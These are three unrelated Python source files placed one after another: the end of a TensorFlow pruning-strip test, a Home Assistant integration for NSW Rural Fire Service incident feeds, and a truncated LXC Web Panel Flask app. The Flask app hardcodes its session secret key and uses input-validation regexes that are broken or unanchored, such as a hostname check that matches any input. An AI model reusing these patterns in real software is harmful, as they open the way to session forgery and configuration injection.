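# Note (commentary added; not part of the original test): because re.match
# anchors at the start of the node name, the pattern above effectively counts
# nodes whose names end in "mask" (the bare alternative "threshold$" only
# matches a name that is exactly "threshold"), i.e. one variable per masked
# layer, which is what _check_removal_of_pruning_vars compares against below.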
def _get_node_names(tensor_names):
return [
strip_pruning_vars_lib._node_name(tensor_name)
for tensor_name in tensor_names
]
class StripPruningVarsTest(test.TestCase):
def setUp(self):
param_list = [
"pruning_frequency=1", "begin_pruning_step=1", "end_pruning_step=10",
"nbins=2048", "threshold_decay=0.0"
]
self.initial_graph = ops.Graph()
self.initial_graph_def = None
self.final_graph = ops.Graph()
self.final_graph_def = None
self.pruning_spec = ",".join(param_list)
with self.initial_graph.as_default():
self.sparsity = variables.Variable(0.5, name="sparsity")
self.global_step = training_util.get_or_create_global_step()
self.increment_global_step = state_ops.assign_add(self.global_step, 1)
self.mask_update_op = None
def _build_convolutional_model(self, number_of_layers):
# Create a graph with several conv2d layers
kernel_size = 3
base_depth = 4
depth_step = 7
height, width = 7, 9
with variable_scope.variable_scope("conv_model"):
input_tensor = array_ops.ones((8, height, width, base_depth))
top_layer = input_tensor
for ix in range(number_of_layers):
top_layer = layers.masked_conv2d(
top_layer,
base_depth + (ix + 1) * depth_step,
kernel_size,
scope="Conv_" + str(ix))
return top_layer
def _build_fully_connected_model(self, number_of_layers):
base_depth = 4
depth_step = 7
input_tensor = array_ops.ones((8, base_depth))
top_layer = input_tensor
with variable_scope.variable_scope("fc_model"):
for ix in range(number_of_layers):
top_layer = layers.masked_fully_connected(
top_layer, base_depth + (ix + 1) * depth_step)
return top_layer
def _build_lstm_model(self, number_of_layers):
batch_size = 8
dim = 10
inputs = variables.Variable(random_ops.random_normal([batch_size, dim]))
def lstm_cell():
return rnn_cells.MaskedBasicLSTMCell(
dim, forget_bias=0.0, state_is_tuple=True, reuse=False)
cell = tf_rnn_cells.MultiRNNCell(
[lstm_cell() for _ in range(number_of_layers)], state_is_tuple=True)
outputs = rnn.static_rnn(
cell, [inputs],
initial_state=cell.zero_state(batch_size, dtypes.float32))
return outputs
def _prune_model(self, session):
pruning_hparams = pruning.get_pruning_hparams().parse(self.pruning_spec)
p = pruning.Pruning(pruning_hparams, sparsity=self.sparsity)
self.mask_update_op = p.conditional_mask_update_op()
variables.global_variables_initializer().run()
for _ in range(20):
session.run(self.mask_update_op)
session.run(self.increment_global_step)
def _get_outputs(self, session, input_graph, tensors_list, graph_prefix=None):
outputs = []
for output_tensor in tensors_list:
if graph_prefix:
output_tensor = graph_prefix + "/" + output_tensor
outputs.append(
session.run(session.graph.get_tensor_by_name(output_tensor)))
return outputs
def _get_initial_outputs(self, output_tensor_names_list):
with self.session(graph=self.initial_graph) as sess1:
self._prune_model(sess1)
reference_outputs = self._get_outputs(sess1, self.initial_graph,
output_tensor_names_list)
self.initial_graph_def = graph_util.convert_variables_to_constants(
sess1, sess1.graph.as_graph_def(),
_get_node_names(output_tensor_names_list))
return reference_outputs
def _get_final_outputs(self, output_tensor_names_list):
self.final_graph_def = strip_pruning_vars_lib.strip_pruning_vars_fn(
self.initial_graph_def, _get_node_names(output_tensor_names_list))
_ = importer.import_graph_def(self.final_graph_def, name="final")
with self.test_session(self.final_graph) as sess2:
final_outputs = self._get_outputs(
sess2,
self.final_graph,
output_tensor_names_list,
graph_prefix="final")
return final_outputs
def _check_removal_of_pruning_vars(self, number_masked_layers):
self.assertEqual(
_get_number_pruning_vars(self.initial_graph_def), number_masked_layers)
self.assertEqual(_get_number_pruning_vars(self.final_graph_def), 0)
def _check_output_equivalence(self, initial_outputs, final_outputs):
for initial_output, final_output in zip(initial_outputs, final_outputs):
self.assertAllEqual(initial_output, final_output)
def testConvolutionalModel(self):
with self.initial_graph.as_default():
number_masked_conv_layers = 5
top_layer = self._build_convolutional_model(number_masked_conv_layers)
output_tensor_names = [top_layer.name]
initial_outputs = self._get_initial_outputs(output_tensor_names)
# Remove pruning-related nodes.
with self.final_graph.as_default():
final_outputs = self._get_final_outputs(output_tensor_names)
# Check that the final graph has no pruning-related vars
self._check_removal_of_pruning_vars(number_masked_conv_layers)
# Check that outputs remain the same after removal of pruning-related nodes
self._check_output_equivalence(initial_outputs, final_outputs)
def testFullyConnectedModel(self):
with self.initial_graph.as_default():
number_masked_fc_layers = 3
top_layer = self._build_fully_connected_model(number_masked_fc_layers)
output_tensor_names = [top_layer.name]
initial_outputs = self._get_initial_outputs(output_tensor_names)
# Remove pruning-related nodes.
with self.final_graph.as_default():
final_outputs = self._get_final_outputs(output_tensor_names)
# Check that the final graph has no pruning-related vars
self._check_removal_of_pruning_vars(number_masked_fc_layers)
# Check that outputs remain the same after removal of pruning-related nodes
self._check_output_equivalence(initial_outputs, final_outputs)
def testLSTMModel(self):
with self.initial_graph.as_default():
number_masked_lstm_layers = 2
outputs = self._build_lstm_model(number_masked_lstm_layers)
output_tensor_names = [outputs[0][0].name]
initial_outputs = self._get_initial_outputs(output_tensor_names)
# Remove pruning-related nodes.
with self.final_graph.as_default():
final_outputs = self._get_final_outputs(output_tensor_names)
# Check that the final graph has no pruning-related vars
self._check_removal_of_pruning_vars(number_masked_lstm_layers)
# Check that outputs remain the same after removal of pruning-related nodes
self._check_output_equivalence(initial_outputs, final_outputs)
if __name__ == "__main__":
test.main()
|
|
"""Support for NSW Rural Fire Service Feeds."""
from __future__ import annotations
from datetime import timedelta
import logging
from aio_geojson_nsw_rfs_incidents import NswRuralFireServiceIncidentsFeedManager
import voluptuous as vol
from homeassistant.components.geo_location import PLATFORM_SCHEMA, GeolocationEvent
from homeassistant.const import (
ATTR_ATTRIBUTION,
ATTR_LOCATION,
CONF_LATITUDE,
CONF_LONGITUDE,
CONF_RADIUS,
CONF_SCAN_INTERVAL,
EVENT_HOMEASSISTANT_START,
EVENT_HOMEASSISTANT_STOP,
LENGTH_KILOMETERS,
)
from homeassistant.core import HomeAssistant, callback
from homeassistant.helpers import aiohttp_client, config_validation as cv
from homeassistant.helpers.dispatcher import (
async_dispatcher_connect,
async_dispatcher_send,
)
from homeassistant.helpers.entity_platform import AddEntitiesCallback
from homeassistant.helpers.event import async_track_time_interval
from homeassistant.helpers.typing import ConfigType, DiscoveryInfoType
_LOGGER = logging.getLogger(__name__)
ATTR_CATEGORY = "category"
ATTR_COUNCIL_AREA = "council_area"
ATTR_EXTERNAL_ID = "external_id"
ATTR_FIRE = "fire"
ATTR_PUBLICATION_DATE = "publication_date"
ATTR_RESPONSIBLE_AGENCY = "responsible_agency"
ATTR_SIZE = "size"
ATTR_STATUS = "status"
ATTR_TYPE = "type"
CONF_CATEGORIES = "categories"
DEFAULT_RADIUS_IN_KM = 20.0
SCAN_INTERVAL = timedelta(minutes=5)
SIGNAL_DELETE_ENTITY = "nsw_rural_fire_service_feed_delete_{}"
SIGNAL_UPDATE_ENTITY = "nsw_rural_fire_service_feed_update_{}"
SOURCE = "nsw_rural_fire_service_feed"
VALID_CATEGORIES = ["Advice", "Emergency Warning", "Not Applicable", "Watch and Act"]
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend(
{
vol.Optional(CONF_CATEGORIES, default=[]): vol.All(
cv.ensure_list, [vol.In(VALID_CATEGORIES)]
),
vol.Optional(CONF_LATITUDE): cv.latitude,
vol.Optional(CONF_LONGITUDE): cv.longitude,
vol.Optional(CONF_RADIUS, default=DEFAULT_RADIUS_IN_KM): vol.Coerce(float),
}
)
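# Illustrative configuration (commentary added; not part of the original
# module). A hedged sketch of a configuration.yaml entry that the schema above
# would accept; coordinates, radius and categories are placeholder values:
#   geo_location:
#     - platform: nsw_rural_fire_service_feed
#       latitude: -33.86
#       longitude: 151.21
#       radius: 50
#       categories:
#         - "Emergency Warning"
#         - "Watch and Act"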
async def async_setup_platform(
hass: HomeAssistant,
config: ConfigType,
async_add_entities: AddEntitiesCallback,
discovery_info: DiscoveryInfoType | None = None,
) -> None:
"""Set up the NSW Rural Fire Service Feed platform."""
scan_interval = config.get(CONF_SCAN_INTERVAL, SCAN_INTERVAL)
coordinates = (
config.get(CONF_LATITUDE, hass.config.latitude),
config.get(CONF_LONGITUDE, hass.config.longitude),
)
radius_in_km = config[CONF_RADIUS]
categories = config.get(CONF_CATEGORIES)
# Initialize the entity manager.
manager = NswRuralFireServiceFeedEntityManager(
hass, async_add_entities, scan_interval, coordinates, radius_in_km, categories
)
async def start_feed_manager(event):
"""Start feed manager."""
await manager.async_init()
async def stop_feed_manager(event):
"""Stop feed manager."""
await manager.async_stop()
hass.bus.async_listen_once(EVENT_HOMEASSISTANT_START, start_feed_manager)
hass.bus.async_listen_once(EVENT_HOMEASSISTANT_STOP, stop_feed_manager)
hass.async_create_task(manager.async_update())
class NswRuralFireServiceFeedEntityManager:
"""Feed Entity Manager for NSW Rural Fire Service GeoJSON feed."""
def __init__(
self,
hass,
async_add_entities,
scan_interval,
coordinates,
radius_in_km,
categories,
):
"""Initialize the Feed Entity Manager."""
self._hass = hass
websession = aiohttp_client.async_get_clientsession(hass)
self._feed_manager = NswRuralFireServiceIncidentsFeedManager(
websession,
self._generate_entity,
self._update_entity,
self._remove_entity,
coordinates,
filter_radius=radius_in_km,
filter_categories=categories,
)
self._async_add_entities = async_add_entities
self._scan_interval = scan_interval
self._track_time_remove_callback = None
async def async_init(self):
"""Schedule initial and regular updates based on configured time interval."""
async def update(event_time):
"""Update."""
await self.async_update()
# Trigger updates at regular intervals.
self._track_time_remove_callback = async_track_time_interval(
self._hass, update, self._scan_interval
)
_LOGGER.debug("Feed entity manager initialized")
async def async_update(self):
"""Refresh data."""
await self._feed_manager.update()
_LOGGER.debug("Feed entity manager updated")
async def async_stop(self):
"""Stop this feed entity manager from refreshing."""
if self._track_time_remove_callback:
self._track_time_remove_callback()
_LOGGER.debug("Feed entity manager stopped")
def get_entry(self, external_id):
"""Get feed entry by external id."""
return self._feed_manager.feed_entries.get(external_id)
async def _generate_entity(self, external_id):
"""Generate new entity."""
new_entity = NswRuralFireServiceLocationEvent(self, external_id)
# Add new entities to HA.
self._async_add_entities([new_entity], True)
async def _update_entity(self, external_id):
"""Update entity."""
async_dispatcher_send(self._hass, SIGNAL_UPDATE_ENTITY.format(external_id))
async def _remove_entity(self, external_id):
"""Remove entity."""
async_dispatcher_send(self._hass, SIGNAL_DELETE_ENTITY.format(external_id))
class NswRuralFireServiceLocationEvent(GeolocationEvent):
"""This represents an external event with NSW Rural Fire Service data."""
def __init__(self, feed_manager, external_id):
"""Initialize entity with data from feed entry."""
self._feed_manager = feed_manager
self._external_id = external_id
self._name = None
self._distance = None
self._latitude = None
self._longitude = None
self._attribution = None
self._category = None
self._publication_date = None
self._location = None
self._council_area = None
self._status = None
self._type = None
self._fire = None
self._size = None
self._responsible_agency = None
self._remove_signal_delete = None
self._remove_signal_update = None
async def async_added_to_hass(self):
"""Call when entity is added to hass."""
self._remove_signal_delete = async_dispatcher_connect(
self.hass,
SIGNAL_DELETE_ENTITY.format(self._external_id),
self._delete_callback,
)
self._remove_signal_update = async_dispatcher_connect(
self.hass,
SIGNAL_UPDATE_ENTITY.format(self._external_id),
self._update_callback,
)
async def async_will_remove_from_hass(self) -> None:
"""Call when entity will be removed from hass."""
self._remove_signal_delete()
self._remove_signal_update()
@callback
def _delete_callback(self):
"""Remove this entity."""
self.hass.async_create_task(self.async_remove(force_remove=True))
@callback
def _update_callback(self):
"""Call update method."""
self.async_schedule_update_ha_state(True)
@property
def should_poll(self):
"""No polling needed for NSW Rural Fire Service location events."""
return False
async def async_update(self):
"""Update this entity from the data held in the feed manager."""
_LOGGER.debug("Updating %s", self._external_id)
feed_entry = self._feed_manager.get_entry(self._external_id)
if feed_entry:
self._update_from_feed(feed_entry)
def _update_from_feed(self, feed_entry):
"""Update the internal state from the provided feed entry."""
self._name = feed_entry.title
self._distance = feed_entry.distance_to_home
self._latitude = feed_entry.coordinates[0]
self._longitude = feed_entry.coordinates[1]
self._attribution = feed_entry.attribution
self._category = feed_entry.category
self._publication_date = feed_entry.publication_date
self._location = feed_entry.location
self._council_area = feed_entry.council_area
self._status = feed_entry.status
self._type = feed_entry.type
self._fire = feed_entry.fire
self._size = feed_entry.size
self._responsible_agency = feed_entry.responsible_agency
@property
def icon(self):
"""Return the icon to use in the frontend."""
if self._fire:
return "mdi:fire"
return "mdi:alarm-light"
@property
def source(self) -> str:
"""Return source value of this external event."""
return SOURCE
@property
def name(self) -> str | None:
"""Return the name of the entity."""
return self._name
@property
def distance(self) -> float | None:
"""Return distance value of this external event."""
return self._distance
@property
def latitude(self) -> float | None:
"""Return latitude value of this external event."""
return self._latitude
@property
def longitude(self) -> float | None:
"""Return longitude value of this external event."""
return self._longitude
@property
def unit_of_measurement(self):
"""Return the unit of measurement."""
return LENGTH_KILOMETERS
@property
def extra_state_attributes(self):
"""Return the device state attributes."""
attributes = {}
for key, value in (
(ATTR_EXTERNAL_ID, self._external_id),
(ATTR_CATEGORY, self._category),
(ATTR_LOCATION, self._location),
(ATTR_ATTRIBUTION, self._attribution),
(ATTR_PUBLICATION_DATE, self._publication_date),
(ATTR_COUNCIL_AREA, self._council_area),
(ATTR_STATUS, self._status),
(ATTR_TYPE, self._type),
(ATTR_FIRE, self._fire),
(ATTR_SIZE, self._size),
(ATTR_RESPONSIBLE_AGENCY, self._responsible_agency),
):
if value or isinstance(value, bool):
attributes[key] = value
return attributes
|
|
# LXC Python Library
# for compatibility with LXC 0.8 and 0.9
# on Ubuntu 12.04/12.10/13.04
# Author: Elie Deloumeau
# Contact: elie@deloumeau.fr
# The MIT License (MIT)
# Copyright (c) 2013 Elie Deloumeau
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
import lxclite as lxc
import lwp
import subprocess
import time
import re
import hashlib
import sqlite3
import os
from flask import Flask, request, session, g, redirect, url_for, abort, \
render_template, flash, jsonify
try:
import configparser
except ImportError:
import ConfigParser as configparser
# configuration
config = configparser.SafeConfigParser()
config.readfp(open('lwp.conf'))
SECRET_KEY = '\xb13\xb6\xfb+Z\xe8\xd1n\x80\x9c\xe7KM' \
'\x1c\xc1\xa7\xf8\xbeY\x9a\xfa<.'
DEBUG = config.getboolean('global', 'debug')
DATABASE = config.get('database', 'file')
ADDRESS = config.get('global', 'address')
PORT = int(config.get('global', 'port'))
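# Illustrative lwp.conf (commentary added; not part of the original module).
# A hedged sketch of the configuration file read above; section and option
# names mirror the config.get() calls in this file, values are placeholders:
#   [global]
#   debug = False
#   address = 0.0.0.0
#   port = 5000
#   [database]
#   file = /var/lwp/lwp.db
#   [session]
#   time = 10
#   [overview]
#   partition = /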
# Flask app
app = Flask(__name__)
app.config.from_object(__name__)
def connect_db():
'''
SQLite3 connect function
'''
return sqlite3.connect(app.config['DATABASE'])
@app.before_request
def before_request():
'''
executed before each request: check the session time limit and open the database connection
'''
check_session_limit()
g.db = connect_db()
@app.teardown_request
def teardown_request(exception):
'''
executed after each request: close the database connection
'''
if hasattr(g, 'db'):
g.db.close()
@app.route('/')
@app.route('/home')
def home():
'''
home page function
'''
if 'logged_in' in session:
listx = lxc.listx()
containers_all = []
for status in ['RUNNING', 'FROZEN', 'STOPPED']:
containers_by_status = []
for container in listx[status]:
containers_by_status.append({
'name': container,
'memusg': lwp.memory_usage(container),
'settings': lwp.get_container_settings(container)
})
containers_all.append({
'status': status.lower(),
'containers': containers_by_status
})
return render_template('index.html', containers=lxc.ls(),
containers_all=containers_all,
dist=lwp.check_ubuntu(),
templates=lwp.get_templates_list())
return render_template('login.html')
@app.route('/about')
def about():
'''
about page
'''
if 'logged_in' in session:
return render_template('about.html', containers=lxc.ls(),
version=lwp.check_version())
return render_template('login.html')
@app.route('/<container>/edit', methods=['POST', 'GET'])
def edit(container=None):
'''
container edit page; applies settings changes on form POST requests
'''
if 'logged_in' in session:
host_memory = lwp.host_memory_usage()
if request.method == 'POST':
cfg = lwp.get_container_settings(container)
ip_regex = '(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?).(25[0-5]' \
'|2[0-4][0-9]|[01]?[0-9][0-9]?).(25[0-5]|2[0-4]' \
'[0-9]|[01]?[0-9][0-9]?).(25[0-5]|2[0-4][0-9]|[01]' \
'?[0-9][0-9]?)(/(3[0-2]|[12]?[0-9]))?'
info = lxc.info(container)
form = {}
form['type'] = request.form['type']
form['link'] = request.form['link']
try:
form['flags'] = request.form['flags']
except KeyError:
form['flags'] = 'down'
form['hwaddr'] = request.form['hwaddress']
form['rootfs'] = request.form['rootfs']
form['utsname'] = request.form['hostname']
form['ipv4'] = request.form['ipaddress']
form['memlimit'] = request.form['memlimit']
form['swlimit'] = request.form['swlimit']
form['cpus'] = request.form['cpus']
form['shares'] = request.form['cpushares']
try:
form['autostart'] = request.form['autostart']
except KeyError:
form['autostart'] = False
if form['utsname'] != cfg['utsname'] and \
re.match('(?!^containers$)|^(([a-zA-Z0-9]|[a-zA-Z0-9]'
'[a-zA-Z0-9\-]*[a-zA-Z0-9])\.)*([A-Za-z0-9]|'
'[A-Za-z0-9][A-Za-z0-9\-]*[A-Za-z0-9])$',
form['utsname']):
lwp.push_config_value('lxc.utsname', form['utsname'],
container=container)
flash(u'Hostname updated for %s!' % container, 'success')
if form['flags'] != cfg['flags'] and \
re.match('^(up|down)$', form['flags']):
lwp.push_config_value('lxc.network.flags', form['flags'],
container=container)
flash(u'Network flag updated for %s!' % container, 'success')
if form['type'] != cfg['type'] and \
re.match('^\w+$', form['type']):
lwp.push_config_value('lxc.network.type', form['type'],
container=container)
flash(u'Link type updated for %s!' % container, 'success')
if form['link'] != cfg['link'] and \
re.match('^[a-zA-Z0-9_-]+$', form['link']):
lwp.push_config_value('lxc.network.link', form['link'],
container=container)
flash(u'Link name updated for %s!' % container, 'success')
if form['hwaddr'] != cfg['hwaddr'] and \
re.match('^([a-fA-F0-9]{2}[:|\-]?){6}$', form['hwaddr']):
lwp.push_config_value('lxc.network.hwaddr', form['hwaddr'],
container=container)
flash(u'Hardware address updated for %s!' % container,
'success')
if (not form['ipv4'] and form['ipv4'] != cfg['ipv4']) or \
(form['ipv4'] != cfg['ipv4'] and
re.match('^%s$' % ip_regex, form['ipv4'])):
lwp.push_config_value('lxc.network.ipv4', form['ipv4'],
container=container)
flash(u'IP address updated for %s!' % container, 'success')
if form['memlimit'] != cfg['memlimit'] and \
form['memlimit'].isdigit() and \
int(form['memlimit']) <= int(host_memory['total']):
if int(form['memlimit']) == int(host_memory['total']):
form['memlimit'] = ''
if form['memlimit'] != cfg['memlimit']:
lwp.push_config_value('lxc.cgroup.memory.limit_in_bytes',
form['memlimit'],
container=container)
if info["state"].lower() != 'stopped':
lxc.cgroup(container,
'lxc.cgroup.memory.limit_in_bytes',
form['memlimit'])
flash(u'Memory limit updated for %s!' % container,
'success')
if form['swlimit'] != cfg['swlimit'] and \
form['swlimit'].isdigit() and \
int(form['swlimit']) <= int(host_memory['total'] * 2):
if int(form['swlimit']) == int(host_memory['total'] * 2):
form['swlimit'] = ''
if form['swlimit'].isdigit():
form['swlimit'] = int(form['swlimit'])
if form['memlimit'].isdigit():
form['memlimit'] = int(form['memlimit'])
if (form['memlimit'] == '' and form['swlimit'] != '') or \
(form['memlimit'] > form['swlimit'] and
form['swlimit'] != ''):
flash(u'Can\'t assign swap memory lower than'
' the memory limit', 'warning')
elif form['swlimit'] != cfg['swlimit'] and \
form['memlimit'] <= form['swlimit']:
lwp.push_config_value(
'lxc.cgroup.memory.memsw.limit_in_bytes',
form['swlimit'], container=container)
if info["state"].lower() != 'stopped':
lxc.cgroup(container,
'lxc.cgroup.memory.memsw.limit_in_bytes',
form['swlimit'])
flash(u'Swap limit updated for %s!' % container, 'success')
if (not form['cpus'] and form['cpus'] != cfg['cpus']) or \
(form['cpus'] != cfg['cpus'] and
re.match('^[0-9,-]+$', form['cpus'])):
lwp.push_config_value('lxc.cgroup.cpuset.cpus', form['cpus'],
container=container)
if info["state"].lower() != 'stopped':
lxc.cgroup(container, 'lxc.cgroup.cpuset.cpus',
form['cpus'])
flash(u'CPUs updated for %s!' % container, 'success')
if (not form['shares'] and form['shares'] != cfg['shares']) or \
(form['shares'] != cfg['shares'] and
re.match('^[0-9]+$', form['shares'])):
lwp.push_config_value('lxc.cgroup.cpu.shares', form['shares'],
container=container)
if info["state"].lower() != 'stopped':
lxc.cgroup(container, 'lxc.cgroup.cpu.shares',
form['shares'])
flash(u'CPU shares updated for %s!' % container, 'success')
if form['rootfs'] != cfg['rootfs'] and \
re.match('^[a-zA-Z0-9_/\-]+', form['rootfs']):
lwp.push_config_value('lxc.rootfs', form['rootfs'],
container=container)
flash(u'Rootfs updated for %s!' % container, 'success')
auto = lwp.ls_auto()
if form['autostart'] == 'True' and \
not ('%s.conf' % container) in auto:
try:
os.symlink('/var/lib/lxc/%s/config' % container,
'/etc/lxc/auto/%s.conf' % container)
flash(u'Autostart enabled for %s' % container, 'success')
except OSError:
flash(u'Unable to create symlink \'/etc/lxc/auto/%s.conf\''
% container, 'error')
elif not form['autostart'] and ('%s.conf' % container) in auto:
try:
os.remove('/etc/lxc/auto/%s.conf' % container)
flash(u'Autostart disabled for %s' % container, 'success')
except OSError:
flash(u'Unable to remove symlink', 'error')
info = lxc.info(container)
status = info['state']
pid = info['pid']
infos = {'status': status,
'pid': pid,
'memusg': lwp.memory_usage(container)}
return render_template('edit.html', containers=lxc.ls(),
container=container, infos=infos,
settings=lwp.get_container_settings(container),
host_memory=host_memory)
return render_template('login.html')
@app.route('/settings/lxc-net', methods=['POST', 'GET'])
def lxc_net():
'''
lxc-net (/etc/default/lxc) settings page; applies changes on form POST requests
'''
if 'logged_in' in session:
if session['su'] != 'Yes':
return abort(403)
if request.method == 'POST':
if lxc.running() == []:
cfg = lwp.get_net_settings()
ip_regex = '(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?).(25[0-5]' \
'|2[0-4][0-9]|[01]?[0-9][0-9]?).(25[0-5]|2[0-4]' \
'[0-9]|[01]?[0-9][0-9]?).(25[0-5]|2[0-4][0-9]|' \
'[01]?[0-9][0-9]?)'
form = {}
try:
form['use'] = request.form['use']
except KeyError:
form['use'] = 'false'
try:
form['bridge'] = request.form['bridge']
except KeyError:
form['bridge'] = None
try:
form['address'] = request.form['address']
except KeyError:
form['address'] = None
try:
form['netmask'] = request.form['netmask']
except KeyError:
form['netmask'] = None
try:
form['network'] = request.form['network']
except KeyError:
form['network'] = None
try:
form['range'] = request.form['range']
except KeyError:
form['range'] = None
try:
form['max'] = request.form['max']
except KeyError:
form['max'] = None
if form['use'] == 'true' and form['use'] != cfg['use']:
lwp.push_net_value('USE_LXC_BRIDGE', 'true')
elif form['use'] == 'false' and form['use'] != cfg['use']:
lwp.push_net_value('USE_LXC_BRIDGE', 'false')
if form['bridge'] and form['bridge'] != cfg['bridge'] \
and re.match('^[a-zA-Z0-9_-]+$', form['bridge']):
lwp.push_net_value('LXC_BRIDGE', form['bridge'])
if form['address'] and form['address'] != cfg['address'] \
and re.match('^%s$' % ip_regex, form['address']):
lwp.push_net_value('LXC_ADDR', form['address'])
if form['netmask'] and form['netmask'] != cfg['netmask'] \
and re.match('^%s$' % ip_regex, form['netmask']):
lwp.push_net_value('LXC_NETMASK', form['netmask'])
if form['network'] and form['network'] != cfg['network'] and \
re.match('^%s(?:/\d{1,2}|)$' % ip_regex,
form['network']):
lwp.push_net_value('LXC_NETWORK', form['network'])
if form['range'] and form['range'] != cfg['range'] and \
re.match('^%s,%s$' % (ip_regex, ip_regex),
form['range']):
lwp.push_net_value('LXC_DHCP_RANGE', form['range'])
if form['max'] and form['max'] != cfg['max'] and \
re.match('^(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)$',
form['max']):
lwp.push_net_value('LXC_DHCP_MAX', form['max'])
if lwp.net_restart() == 0:
flash(u'LXC Network settings applied successfully!',
'success')
else:
flash(u'Failed to restart LXC networking.', 'error')
else:
flash(u'Stop all containers before restarting lxc-net.',
'warning')
return render_template('lxc-net.html', containers=lxc.ls(),
cfg=lwp.get_net_settings(),
running=lxc.running())
return render_template('login.html')
@app.route('/lwp/users', methods=['POST', 'GET'])
def lwp_users():
'''
returns users and handles POST requests to edit or add a user on the page.
this function uses sqlite3
'''
if 'logged_in' in session:
if session['su'] != 'Yes':
return abort(403)
trash = request.args.get('trash', 0)
su_users = query_db("SELECT COUNT(id) as num FROM users "
"WHERE su='Yes'", [], one=True)
if request.args.get('token') == session.get('token') and \
int(trash) == 1 and request.args.get('userid') and \
request.args.get('username'):
nb_users = query_db("SELECT COUNT(id) as num FROM users", [],
one=True)
if nb_users['num'] > 1:
if su_users['num'] <= 1:
su_user = query_db("SELECT username FROM users "
"WHERE su='Yes'", [], one=True)
if su_user['username'] == request.args.get('username'):
flash(u'Can\'t delete the last admin user : %s' %
request.args.get('username'), 'error')
return redirect(url_for('lwp_users'))
g.db.execute("DELETE FROM users WHERE id=? AND username=?",
[request.args.get('userid'),
request.args.get('username')])
g.db.commit()
flash(u'Deleted %s' % request.args.get('username'), 'success')
return redirect(url_for('lwp_users'))
flash(u'Can\'t delete the last user!', 'error')
return redirect(url_for('lwp_users'))
if request.method == 'POST':
users = query_db('SELECT id, name, username, su FROM users '
'ORDER BY id ASC')
if request.form['newUser'] == 'True':
if not request.form['username'] in \
[user['username'] for user in users]:
if re.match('^\w+$', request.form['username']) and \
request.form['password1']:
if request.form['password1'] == \
request.form['password2']:
if request.form['name']:
if re.match('[a-z A-Z0-9]{3,32}',
request.form['name']):
g.db.execute(
"INSERT INTO users "
"(name, username, password) "
"VALUES (?, ?, ?)",
[request.form['name'],
request.form['username'],
hash_passwd(
request.form['password1'])])
g.db.commit()
else:
flash(u'Invalid name!', 'error')
else:
g.db.execute("INSERT INTO users "
"(username, password) VALUES "
"(?, ?)",
[request.form['username'],
hash_passwd(
request.form['password1'])])
g.db.commit()
flash(u'Created %s' % request.form['username'],
'success')
else:
flash(u'No password match', 'error')
else:
flash(u'Invalid username or password!', 'error')
else:
flash(u'Username already exists!', 'error')
elif request.form['newUser'] == 'False':
if request.form['password1'] == request.form['password2']:
if re.match('[a-z A-Z0-9]{3,32}', request.form['name']):
if su_users['num'] <= 1:
su = 'Yes'
else:
try:
su = request.form['su']
except KeyError:
su = 'No'
if not request.form['name']:
g.db.execute("UPDATE users SET name='', su=? "
"WHERE username=?",
[su, request.form['username']])
g.db.commit()
elif request.form['name'] and \
not request.form['password1'] and \
not request.form['password2']:
g.db.execute("UPDATE users SET name=?, su=? "
"WHERE username=?",
[request.form['name'], su,
request.form['username']])
g.db.commit()
elif request.form['name'] and \
request.form['password1'] and \
request.form['password2']:
g.db.execute("UPDATE users SET "
"name=?, password=?, su=? WHERE "
"username=?",
[request.form['name'],
hash_passwd(
request.form['password1']),
su, request.form['username']])
g.db.commit()
elif request.form['password1'] and \
request.form['password2']:
g.db.execute("UPDATE users SET password=?, su=? "
"WHERE username=?",
[hash_passwd(
request.form['password1']),
su, request.form['username']])
g.db.commit()
flash(u'Updated', 'success')
else:
flash(u'Invalid name!', 'error')
else:
flash(u'No password match', 'error')
else:
flash(u'Unknown error!', 'error')
users = query_db("SELECT id, name, username, su FROM users "
"ORDER BY id ASC")
nb_users = query_db("SELECT COUNT(id) as num FROM users", [], one=True)
su_users = query_db("SELECT COUNT(id) as num FROM users "
"WHERE su='Yes'", [], one=True)
return render_template('users.html', containers=lxc.ls(), users=users,
nb_users=nb_users, su_users=su_users)
return render_template('login.html')
@app.route('/checkconfig')
def checkconfig():
'''
returns the output of the lxc-checkconfig command
'''
if 'logged_in' in session:
if session['su'] != 'Yes':
return abort(403)
return render_template('checkconfig.html', containers=lxc.ls(),
cfg=lxc.checkconfig())
return render_template('login.html')
@app.route('/action', methods=['GET'])
def action():
'''
manages all actions related to containers:
lxc-start, lxc-stop, etc.
'''
if 'logged_in' in session:
if request.args['token'] == session.get('token'):
action = request.args['action']
name = request.args['name']
if action == 'start':
try:
if lxc.start(name) == 0:
# Fix bug : "the container is randomly not
# displayed in overview list after a boot"
time.sleep(1)
flash(u'Container %s started successfully!' % name,
'success')
else:
flash(u'Unable to start %s!' % name, 'error')
except lxc.ContainerAlreadyRunning:
flash(u'Container %s is already running!' % name, 'error')
elif action == 'stop':
try:
if lxc.stop(name) == 0:
flash(u'Container %s stopped successfully!' % name,
'success')
else:
flash(u'Unable to stop %s!' % name, 'error')
except lxc.ContainerNotRunning:
flash(u'Container %s is already stopped!' % name, 'error')
elif action == 'freeze':
try:
if lxc.freeze(name) == 0:
flash(u'Container %s frozen successfully!' % name,
'success')
else:
flash(u'Unable to freeze %s!' % name, 'error')
except lxc.ContainerNotRunning:
flash(u'Container %s not running!' % name, 'error')
elif action == 'unfreeze':
try:
if lxc.unfreeze(name) == 0:
flash(u'Container %s unfrozen successfully!' % name,
'success')
else:
flash(u'Unable to unfreeze %s!' % name, 'error')
